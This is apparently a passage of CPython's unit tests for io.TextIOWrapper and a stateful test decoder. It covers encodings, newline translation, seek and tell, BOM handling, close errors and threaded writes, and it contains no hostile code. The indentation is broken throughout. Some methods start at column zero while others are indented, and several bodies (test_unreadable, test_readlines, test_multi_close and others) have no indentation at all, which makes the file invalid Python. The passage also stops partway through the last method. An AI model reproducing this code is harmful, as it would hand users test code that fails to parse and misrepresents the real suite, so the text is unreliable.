        latin1 = codecs.lookup('latin-1')
        return codecs.CodecInfo(
            name='test_decoder', encode=latin1.encode, decode=None,
            incrementalencoder=None,
            streamreader=None, streamwriter=None,
            incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
# (lookupTestDecoder returns None unless codecEnabled is set.)
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
    """
    Make sure the StatefulIncrementalDecoder actually works.
    """

    # Each entry is (input bytes, final flag, expected decoded output).
    test_cases = [
        # I=1, O=1 (fixed-length input == fixed-length output)
        (b'abcd', False, 'a.b.c.d.'),
        # I=0, O=0 (variable-length input, variable-length output)
        (b'oiabcd', True, 'abcd.'),
        # I=0, O=0 (should ignore extra periods)
        (b'oi...abcd...', True, 'abcd.'),
        # I=0, O=6 (variable-length input, fixed-length output)
        (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
        # I=2, O=6 (fixed-length input < fixed-length output)
        (b'i.i2.o6xyz', True, 'xy----.z-----.'),
        # I=6, O=3 (fixed-length input > fixed-length output)
        (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
        # I=0, then 3; O=29, then 15 (with longer output)
        (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
         'a----------------------------.' +
         'b----------------------------.' +
         'cde--------------------------.' +
         'abcdefghijabcde.' +
         'a.b------------.' +
         '.c.------------.' +
         'd.e------------.' +
         'k--------------.' +
         'l--------------.' +
         'm--------------.')
    ]

    def test_decoder(self):
        # Try a few one-shot test cases.
        for input, eof, output in self.test_cases:
            d = StatefulIncrementalDecoder()
            self.assertEqual(d.decode(input, eof), output)

        # Also test an unfinished decode, followed by forcing EOF.
        d = StatefulIncrementalDecoder()
        self.assertEqual(d.decode(b'oiabcd'), '')
        self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
    # Raw sample with mixed \r\n, \r and \n line endings, plus its
    # universal-newlines-translated text form.
    self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
    self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
    support.unlink(support.TESTFN)

def tearDown(self):
    support.unlink(support.TESTFN)
def test_constructor(self):
    """Construction and re-__init__ of a TextIOWrapper, plus rejection
    of invalid newline arguments."""
    r = self.BytesIO(b"\xc3\xa9\n\n")
    b = self.BufferedReader(r, 1000)
    t = self.TextIOWrapper(b)
    # Re-initializing replaces encoding/newline settings in place.
    t.__init__(b, encoding="latin-1", newline="\r\n")
    self.assertEqual(t.encoding, "latin-1")
    self.assertEqual(t.line_buffering, False)
    t.__init__(b, encoding="utf-8", line_buffering=True)
    self.assertEqual(t.encoding, "utf-8")
    self.assertEqual(t.line_buffering, True)
    self.assertEqual("\xe9\n", t.readline())
    # newline must be None or one of '', '\n', '\r', '\r\n'.
    self.assertRaises(TypeError, t.__init__, b, newline=42)
    self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_non_text_encoding_codecs_are_rejected(self):
    # Ensure the constructor complains if passed a codec that isn't
    # marked as a text encoding
    # http://bugs.python.org/issue20404
    r = self.BytesIO()
    b = self.BufferedWriter(r)
    with self.assertRaisesRegex(LookupError, "is not a text encoding"):
        self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
    """detach() returns the buffer, flushes pending text, and leaves the
    wrapper usable only for stream-independent operations."""
    r = self.BytesIO()
    b = self.BufferedWriter(r)
    t = self.TextIOWrapper(b)
    self.assertIs(t.detach(), b)

    t = self.TextIOWrapper(b, encoding="ascii")
    t.write("howdy")
    self.assertFalse(r.getvalue())
    # Detaching flushes the pending write to the underlying stream.
    t.detach()
    self.assertEqual(r.getvalue(), b"howdy")
    # A second detach on the same wrapper fails.
    self.assertRaises(ValueError, t.detach)

    # Operations independent of the detached stream should still work
    repr(t)
    self.assertEqual(t.encoding, "ascii")
    self.assertEqual(t.errors, "strict")
    self.assertFalse(t.line_buffering)
def test_repr(self):
    """repr() must reflect name/mode/encoding as they become available,
    and must not raise on a detached wrapper."""
    raw = self.BytesIO("hello".encode("utf-8"))
    b = self.BufferedReader(raw)
    t = self.TextIOWrapper(b, encoding="utf-8")
    modname = self.TextIOWrapper.__module__
    self.assertEqual(repr(t),
                     "<%s.TextIOWrapper encoding='utf-8'>" % modname)
    raw.name = "dummy"
    self.assertEqual(repr(t),
                     "<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
    t.mode = "r"
    self.assertEqual(repr(t),
                     "<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
    raw.name = b"dummy"
    self.assertEqual(repr(t),
                     "<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)

    t.buffer.detach()
    repr(t) # Should not raise an exception
def test_line_buffering(self):
    # With line_buffering=True, output is flushed when a '\n' or '\r'
    # is written, and only then.
    backing = self.BytesIO()
    buffered = self.BufferedWriter(backing, 1000)
    text = self.TextIOWrapper(buffered, newline="\n", line_buffering=True)
    text.write("X")
    self.assertEqual(backing.getvalue(), b"") # No flush happened
    text.write("Y\nZ")
    self.assertEqual(backing.getvalue(), b"XY\nZ") # All got flushed
    text.write("A\rB")
    self.assertEqual(backing.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
    """Without an explicit encoding, TextIOWrapper must pick the current
    locale encoding (not the user-preferred one)."""
    old_environ = dict(os.environ)
    try:
        # try to get a user preferred encoding different than the current
        # locale encoding to check that TextIOWrapper() uses the current
        # locale encoding and not the user preferred encoding
        for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
            if key in os.environ:
                del os.environ[key]

        current_locale_encoding = locale.getpreferredencoding(False)
        b = self.BytesIO()
        t = self.TextIOWrapper(b)
        self.assertEqual(t.encoding, current_locale_encoding)
    finally:
        # Restore the environment exactly as it was.
        os.environ.clear()
        os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
    # Issue 15989
    # fileno() values that overflow a C int must raise OverflowError
    # instead of being silently truncated.
    import _testcapi
    b = self.BytesIO()
    b.fileno = lambda: _testcapi.INT_MAX + 1
    self.assertRaises(OverflowError, self.TextIOWrapper, b)
    b.fileno = lambda: _testcapi.UINT_MAX + 1
    self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
    # Check the encoding attribute is always set, and valid
    b = self.BytesIO()
    t = self.TextIOWrapper(b, encoding="utf-8")
    self.assertEqual(t.encoding, "utf-8")
    t = self.TextIOWrapper(b)
    self.assertTrue(t.encoding is not None)
    # The default encoding must be resolvable by the codecs machinery.
    codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
    """Each errors= policy applied to an undecodable byte on read."""
    # (1) default
    b = self.BytesIO(b"abc\n\xff\n")
    t = self.TextIOWrapper(b, encoding="ascii")
    self.assertRaises(UnicodeError, t.read)
    # (2) explicit strict
    b = self.BytesIO(b"abc\n\xff\n")
    t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
    self.assertRaises(UnicodeError, t.read)
    # (3) ignore
    b = self.BytesIO(b"abc\n\xff\n")
    t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
    self.assertEqual(t.read(), "abc\n\n")
    # (4) replace
    b = self.BytesIO(b"abc\n\xff\n")
    t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
    self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
    """Each errors= policy applied to an unencodable character on write."""
    # (1) default
    b = self.BytesIO()
    t = self.TextIOWrapper(b, encoding="ascii")
    self.assertRaises(UnicodeError, t.write, "\xff")
    # (2) explicit strict
    b = self.BytesIO()
    t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
    self.assertRaises(UnicodeError, t.write, "\xff")
    # (3) ignore
    b = self.BytesIO()
    t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
                           newline="\n")
    t.write("abc\xffdef\n")
    t.flush()
    self.assertEqual(b.getvalue(), b"abcdef\n")
    # (4) replace
    b = self.BytesIO()
    t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
                           newline="\n")
    t.write("abc\xffdef\n")
    t.flush()
    self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
    """Universal-newline translation on input across every newline= mode,
    several encodings, varying buffer sizes and read strategies."""
    input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]

    # (newline argument, expected lines) pairs.
    tests = [
        [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
        [ '', input_lines ],
        [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
        [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
        [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
    ]
    encodings = (
        'utf-8', 'latin-1',
        'utf-16', 'utf-16-le', 'utf-16-be',
        'utf-32', 'utf-32-le', 'utf-32-be',
    )

    # Try a range of buffer sizes to test the case where \r is the last
    # character in TextIOWrapper._pending_line.
    for encoding in encodings:
        # XXX: str.encode() should return bytes
        data = bytes(''.join(input_lines).encode(encoding))
        for do_reads in (False, True):
            for bufsize in range(1, 10):
                for newline, exp_lines in tests:
                    bufio = self.BufferedReader(self.BytesIO(data), bufsize)
                    textio = self.TextIOWrapper(bufio, newline=newline,
                                                encoding=encoding)
                    if do_reads:
                        # Consume via fixed-size read() + readline() so
                        # translation also works mid-line.
                        got_lines = []
                        while True:
                            c2 = textio.read(2)
                            if c2 == '':
                                break
                            self.assertEqual(len(c2), 2)
                            got_lines.append(c2 + textio.readline())
                    else:
                        got_lines = list(textio)

                    for got_line, exp_line in zip(got_lines, exp_lines):
                        self.assertEqual(got_line, exp_line)
                    self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
    """Line splitting on input for each newline= mode, including data
    containing an embedded NUL byte."""
    testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
    normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    for newline, expected in [
        (None, normalized.decode("ascii").splitlines(keepends=True)),
        ("", testdata.decode("ascii").splitlines(keepends=True)),
        ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
        ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
        ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
        ]:
        buf = self.BytesIO(testdata)
        txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
        self.assertEqual(txt.readlines(), expected)
        txt.seek(0)
        self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
    """'\\n' translation on output for each newline= mode; literal '\\r'
    characters in the text are never translated."""
    testdict = {
        "": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
        "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
        "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
        "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
        }
    # newline=None writes os.linesep.
    tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
    for newline, expected in tests:
        buf = self.BytesIO()
        txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
        txt.write("AAA\nB")
        txt.write("BB\nCCC\n")
        txt.write("X\rY\r\nZ")
        txt.flush()
        self.assertEqual(buf.closed, False)
        self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
    # Destroying the wrapper must flush pending text before the
    # underlying stream is closed.
    l = []
    base = self.BytesIO
    class MyBytesIO(base):
        def close(self):
            # Capture the contents at close time.
            l.append(self.getvalue())
            base.close(self)
    b = MyBytesIO()
    t = self.TextIOWrapper(b, encoding="ascii")
    t.write("abc")
    del t
    support.gc_collect()
    self.assertEqual([b"abc"], l)
def test_override_destructor(self):
    # A subclass overriding __del__/close/flush must see its overrides
    # called, in that order, when the object is destroyed.
    record = []
    class MyTextIO(self.TextIOWrapper):
        def __del__(self):
            record.append(1)
            try:
                # The base class may or may not define __del__.
                f = super().__del__
            except AttributeError:
                pass
            else:
                f()
        def close(self):
            record.append(2)
            super().close()
        def flush(self):
            record.append(3)
            super().flush()
    b = self.BytesIO()
    t = MyTextIO(b, encoding="ascii")
    del t
    support.gc_collect()
    self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
    # Test that the exception state is not modified by a destructor,
    # even if close() fails.
    rawio = self.CloseFailureIO()
    def f():
        # The attribute error is what the caller should see; the failed
        # close() in the destructor must not replace it.
        self.TextIOWrapper(rawio).xyzzy
    with support.captured_output("stderr") as s:
        self.assertRaises(AttributeError, f)
    s = s.getvalue().strip()
    if s:
        # The destructor *may* have printed an unraisable error, check it
        self.assertEqual(len(s.splitlines()), 1)
        self.assertTrue(s.startswith("Exception OSError: "), s)
        self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
    """Round-trip write/read/seek/tell over several chunk sizes and
    encodings."""
    for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
        for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
            f = self.open(support.TESTFN, "w+", encoding=enc)
            f._CHUNK_SIZE = chunksize
            self.assertEqual(f.write("abc"), 3)
            f.close()
            f = self.open(support.TESTFN, "r+", encoding=enc)
            f._CHUNK_SIZE = chunksize
            self.assertEqual(f.tell(), 0)
            self.assertEqual(f.read(), "abc")
            cookie = f.tell()
            self.assertEqual(f.seek(0), 0)
            self.assertEqual(f.read(None), "abc")
            f.seek(0)
            self.assertEqual(f.read(2), "ab")
            self.assertEqual(f.read(1), "c")
            self.assertEqual(f.read(1), "")
            self.assertEqual(f.read(), "")
            # At EOF, tell() returns the same cookie again.
            self.assertEqual(f.tell(), cookie)
            self.assertEqual(f.seek(0), 0)
            self.assertEqual(f.seek(0, 2), cookie)
            self.assertEqual(f.write("def"), 3)
            self.assertEqual(f.seek(cookie), cookie)
            self.assertEqual(f.read(), "def")
            if enc.startswith("utf"):
                self.multi_line_test(f, enc)
            f.close()
def multi_line_test(self, f, enc):
    """Write lines of many lengths of multi-byte text, then verify that
    tell() positions recorded while writing match those seen reading."""
    f.seek(0)
    f.truncate()
    # Cycle through 1-, 2- and 3-byte (UTF-8) characters.
    sample = "s\xff\u0fff\uffff"
    wlines = []
    for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
        chars = []
        for i in range(size):
            chars.append(sample[i % len(sample)])
        line = "".join(chars) + "\n"
        # Remember (position, line) pairs as written.
        wlines.append((f.tell(), line))
        f.write(line)
    f.seek(0)
    rlines = []
    while True:
        pos = f.tell()
        line = f.readline()
        if not line:
            break
        rlines.append((pos, line))
    self.assertEqual(rlines, wlines)
def test_telling(self):
    """tell() positions around multi-byte characters, and the rule that
    tell() fails in the middle of iteration."""
    f = self.open(support.TESTFN, "w+", encoding="utf-8")
    p0 = f.tell()
    f.write("\xff\n")
    p1 = f.tell()
    f.write("\xff\n")
    p2 = f.tell()
    f.seek(0)
    self.assertEqual(f.tell(), p0)
    self.assertEqual(f.readline(), "\xff\n")
    self.assertEqual(f.tell(), p1)
    self.assertEqual(f.readline(), "\xff\n")
    self.assertEqual(f.tell(), p2)
    f.seek(0)
    # tell() is not allowed while the file is being iterated.
    for line in f:
        self.assertEqual(line, "\xff\n")
        self.assertRaises(OSError, f.tell)
    # Once iteration is over, tell() works again.
    self.assertEqual(f.tell(), p2)
    f.close()
def test_seeking(self):
    """Read positions near the decoder chunk boundary with a multi-byte
    character straddling it."""
    chunk_size = _default_chunk_size()
    prefix_size = chunk_size - 2
    u_prefix = "a" * prefix_size
    prefix = bytes(u_prefix.encode("utf-8"))
    # ASCII prefix: one byte per character.
    self.assertEqual(len(u_prefix), len(prefix))
    u_suffix = "\u8888\n"
    suffix = bytes(u_suffix.encode("utf-8"))
    line = prefix + suffix
    with self.open(support.TESTFN, "wb") as f:
        f.write(line*2)
    with self.open(support.TESTFN, "r", encoding="utf-8") as f:
        s = f.read(prefix_size)
        self.assertEqual(s, str(prefix, "ascii"))
        self.assertEqual(f.tell(), prefix_size)
        self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
    # Regression test for a specific bug
    # A 3-byte UTF-8 character read with _CHUNK_SIZE = 2 must not break
    # readline()/tell().
    data = b'\xe0\xbf\xbf\n'
    with self.open(support.TESTFN, "wb") as f:
        f.write(data)
    with self.open(support.TESTFN, "r", encoding="utf-8") as f:
        f._CHUNK_SIZE # Just test that it exists
        f._CHUNK_SIZE = 2
        f.readline()
        f.tell()
def test_seek_and_tell(self):
    #Test seek/tell using the StatefulIncrementalDecoder.
    # Make test faster by doing smaller seeks
    CHUNK_SIZE = 128

    def test_seek_and_tell_with_data(data, min_pos=0):
        """Tell/seek to various points within a data stream and ensure
        that the decoded data returned by read() is consistent."""
        f = self.open(support.TESTFN, 'wb')
        f.write(data)
        f.close()
        f = self.open(support.TESTFN, encoding='test_decoder')
        f._CHUNK_SIZE = CHUNK_SIZE
        decoded = f.read()
        f.close()

        for i in range(min_pos, len(decoded) + 1): # seek positions
            for j in [1, 5, len(decoded) - i]: # read lengths
                f = self.open(support.TESTFN, encoding='test_decoder')
                self.assertEqual(f.read(i), decoded[:i])
                cookie = f.tell()
                self.assertEqual(f.read(j), decoded[i:i + j])
                # Seeking back to the cookie must restore decoder state.
                f.seek(cookie)
                self.assertEqual(f.read(), decoded[i:])
                f.close()

    # Enable the test decoder.
    StatefulIncrementalDecoder.codecEnabled = 1

    # Run the tests.
    try:
        # Try each test case.
        for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
            test_seek_and_tell_with_data(input)

        # Position each test case so that it crosses a chunk boundary.
        for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
            offset = CHUNK_SIZE - len(input)//2
            prefix = b'.'*offset
            # Don't bother seeking into the prefix (takes too long).
            min_pos = offset*2
            test_seek_and_tell_with_data(prefix + input, min_pos)

    # Ensure our test decoder won't interfere with subsequent tests.
    finally:
        StatefulIncrementalDecoder.codecEnabled = 0
    def test_encoded_writes(self):
        """For BOM-emitting encodings, two writes must produce one BOM and
        reading back (twice) must return the concatenated data."""
        data = "1234567890"
        tests = ("utf-16",
                 "utf-16-le",
                 "utf-16-be",
                 "utf-32",
                 "utf-32-le",
                 "utf-32-be")
        for encoding in tests:
            buf = self.BytesIO()
            f = self.TextIOWrapper(buf, encoding=encoding)
            # Check if the BOM is written only once (see issue1753).
            f.write(data)
            f.write(data)
            f.seek(0)
            self.assertEqual(f.read(), data * 2)
            f.seek(0)
            self.assertEqual(f.read(), data * 2)
            # codecs' .encode() also emits the BOM once, so raw bytes match.
            self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
    def test_issue1395_1(self):
        """Issue #1395: newline translation is correct when reading the
        test data one character at a time."""
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        # read one char at a time
        reads = ""
        while True:
            c = txt.read(1)
            if not c:
                break
            reads += c
        self.assertEqual(reads, self.normalized)
    def test_issue1395_2(self):
        """Issue #1395: same as _1 but with a tiny chunk size and
        4-character reads."""
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4
        reads = ""
        while True:
            c = txt.read(4)
            if not c:
                break
            reads += c
        self.assertEqual(reads, self.normalized)
    def test_issue1395_3(self):
        """Issue #1395: mixing read(n) and readline() with a tiny chunk
        size still yields the normalized data."""
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4
        reads = txt.read(4)
        reads += txt.read(4)
        reads += txt.readline()
        reads += txt.readline()
        reads += txt.readline()
        self.assertEqual(reads, self.normalized)
    def test_issue1395_4(self):
        """Issue #1395: read(4) followed by read() to EOF with a tiny
        chunk size still yields the normalized data."""
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4
        reads = txt.read(4)
        reads += txt.read()
        self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
    def test_append_bom(self):
        # The BOM is not written again when appending to a non-empty file
        filename = support.TESTFN
        for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
            with self.open(filename, 'w', encoding=charset) as f:
                f.write('aaa')
                # NOTE(review): pos is unused in this test; the matching
                # test_seek_bom below uses it — kept for symmetry.
                pos = f.tell()
            with self.open(filename, 'rb') as f:
                self.assertEqual(f.read(), 'aaa'.encode(charset))
            with self.open(filename, 'a', encoding=charset) as f:
                f.write('xxx')
            # encode() on the full text yields exactly one BOM, so equality
            # proves the append did not emit a second one.
            with self.open(filename, 'rb') as f:
                self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
    def test_seek_bom(self):
        # Same test, but when seeking manually
        """Writing after a manual seek past the BOM must not emit another
        BOM, and overwriting at position 0 must not duplicate it either."""
        filename = support.TESTFN
        for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
            with self.open(filename, 'w', encoding=charset) as f:
                f.write('aaa')
                pos = f.tell()
            with self.open(filename, 'r+', encoding=charset) as f:
                f.seek(pos)
                f.write('zzz')
                f.seek(0)
                f.write('bbb')
            with self.open(filename, 'rb') as f:
                self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
    @support.no_tracing
    @unittest.skipUnless(threading, 'Threading required for this test.')
    def test_threads_write(self):
        # Issue6750: concurrent writes could duplicate data
        event = threading.Event()
        with self.open(support.TESTFN, "w", buffering=1) as f:
            def run(n):
                text = "Thread%03d\n" % n
                # Block until all threads are started, to maximize contention.
                event.wait()
                f.write(text)
            threads = [threading.Thread(target=lambda n=x: run(n))
                       for x in range(20)]
            for t in threads:
                t.start()
            time.sleep(0.02)
            # Release all writers at once.
            event.set()
            for t in threads:
                t.join()
        with self.open(support.TESTFN) as f:
            content = f.read()
            # Each thread's line must appear exactly once — no duplication.
            for n in range(20):
                self.assertEqual(content.count("Thread%03d\n" % n), 1)
    def test_flush_error_on_close(self):
        """An error raised by flush() during close() propagates, yet the
        wrapper still ends up closed."""
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        def bad_flush():
            raise OSError()
        txt.flush = bad_flush
        self.assertRaises(OSError, txt.close) # exception not swallowed
        self.assertTrue(txt.closed)
    def test_close_error_on_close(self):
        """When both flush() and the buffer's close() fail, the close error
        is raised with the flush error chained as its __context__."""
        buffer = self.BytesIO(self.testdata)
        def bad_flush():
            raise OSError('flush')
        def bad_close():
            raise OSError('close')
        buffer.close = bad_close
        txt = self.TextIOWrapper(buffer, encoding="ascii")
        txt.flush = bad_flush
        with self.assertRaises(OSError) as err: # exception not swallowed
            txt.close()
        self.assertEqual(err.exception.args, ('close',))
        self.assertIsInstance(err.exception.__context__, OSError)
        self.assertEqual(err.exception.__context__.args, ('flush',))
        # The buffer's close() failed, so the wrapper is not marked closed.
        self.assertFalse(txt.closed)
    def test_nonnormalized_close_error_on_close(self):
        # Issue #21677
        """Same chaining behaviour as test_close_error_on_close, but with
        exceptions raised lazily via undefined names (NameError)."""
        buffer = self.BytesIO(self.testdata)
        def bad_flush():
            raise non_existing_flush
        def bad_close():
            raise non_existing_close
        buffer.close = bad_close
        txt = self.TextIOWrapper(buffer, encoding="ascii")
        txt.flush = bad_flush
        with self.assertRaises(NameError) as err: # exception not swallowed
            txt.close()
        self.assertIn('non_existing_close', str(err.exception))
        self.assertIsInstance(err.exception.__context__, NameError)
        self.assertIn('non_existing_flush', str(err.exception.__context__))
        self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
    def test_rawio(self):
        # Issue #12591: TextIOWrapper must work with raw I/O objects, so
        # that subprocess.Popen() can have the required unbuffered
        # semantics with universal_newlines=True.
        raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        # Reads
        # Reads span the raw chunks transparently.
        self.assertEqual(txt.read(4), 'abcd')
        self.assertEqual(txt.readline(), 'efghi\n')
        self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
    def test_rawio_write_through(self):
        # Issue #12591: with write_through=True, writes don't need a flush
        raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
                                 write_through=True)
        txt.write('1')
        txt.write('23\n4')
        txt.write('5')
        # All writes reached the raw object without an explicit flush().
        self.assertEqual(b''.join(raw._write_stack), b'123\n45')
    def test_bufio_write_through(self):
        # Issue #21396: write_through=True doesn't force a flush()
        # on the underlying binary buffered object.
        flush_called, write_called = [], []
        # Instrumented writer that records flush()/write() invocations.
        class BufferedWriter(self.BufferedWriter):
            def flush(self, *args, **kwargs):
                flush_called.append(True)
                return super().flush(*args, **kwargs)
            def write(self, *args, **kwargs):
                write_called.append(True)
                return super().write(*args, **kwargs)
        rawio = self.BytesIO()
        data = b"a"
        bufio = BufferedWriter(rawio, len(data)*2)
        textio = self.TextIOWrapper(bufio, encoding='ascii',
                                    write_through=True)
        # write to the buffered io but don't overflow the buffer
        text = data.decode('ascii')
        textio.write(text)
        # buffer.flush is not called with write_through=True
        self.assertFalse(flush_called)
        # buffer.write *is* called with write_through=True
        self.assertTrue(write_called)
        self.assertEqual(rawio.getvalue(), b"") # no flush
        write_called = [] # reset
        textio.write(text * 10) # total content is larger than bufio buffer
        self.assertTrue(write_called)
        self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
    def test_illegal_decoder(self):
        # Issue #17106
        # Bypass the early encoding check added in issue 20404
        def _make_illegal_wrapper():
            # Temporarily mark the bytes-to-bytes "quopri" codec as a text
            # encoding so TextIOWrapper will accept it; its decoder then
            # returns bytes instead of str, which must raise, not crash.
            quopri = codecs.lookup("quopri")
            quopri._is_text_encoding = True
            try:
                t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
                                       newline='\n', encoding="quopri")
            finally:
                quopri._is_text_encoding = False
            return t
        # Crash when decoder returns non-string
        t = _make_illegal_wrapper()
        self.assertRaises(TypeError, t.read, 1)
        t = _make_illegal_wrapper()
        self.assertRaises(TypeError, t.readline)
        t = _make_illegal_wrapper()
        self.assertRaises(TypeError, t.read)
    def _check_create_at_shutdown(self, **kwargs):
        # Issue #20037: creating a TextIOWrapper at shutdown
        # shouldn't crash the interpreter.
